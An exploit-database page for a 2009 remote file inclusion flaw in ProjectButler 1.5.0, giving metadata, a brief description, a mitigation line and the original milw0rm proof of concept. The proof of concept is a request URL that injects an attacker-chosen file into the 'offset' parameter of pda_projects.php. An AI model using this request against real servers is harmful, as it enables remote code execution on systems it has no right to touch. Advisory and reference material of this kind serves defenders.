header-logo
Suggest Exploit
vendor:
ProjectButler
by:
cr4wl3r
9,3
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: ProjectButler
Affected Version From: 1.5.0
Affected Version To: 1.5.0
Patch Exists: NO
Related CWE: N/A
CPE: a:projectbutler:projectbutler:1.5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

projectbutler – 1.5.0 (offset) RFI Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'offset' parameter of 'pda_projects.php' script. A remote attacker can send a specially crafted HTTP request with arbitrary file inclusion in the 'offset' parameter and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

#projectbutler - 1.5.0 (offset) RFI Vulnerability

#Author: cr4wl3r

#Contact: cr4wl3r[4t]linuxmail[dot]org

#Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz

#Vuln : require_once($offset."class.project.inc");

#PoC :

http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea]

#Greetz : MyMom [alm]

#Special To : |CyberSufi| |CyberPeaCe| |AgenR@t| |Ea.ngel| |bl4ck.3n91n3| |Hmei7| |Dew0| |Anjas.chu'X| |Ridwan|              

              |Funky_sensey| |zvtral| |Is.bl4nk| |Y0ps.512mb| |Clif| |HaKu Frisca| |All cRew GoRonTaLo UnDeRgounD|
              |SunKetzu AbbaSSia| |iY0ng| |MaTr0| |deviln3t| |RyO| RaIs R0yaS| |Vel!x| |AnaK2 BolMonG| |MarLoN|

# milw0rm.com [2009-08-03]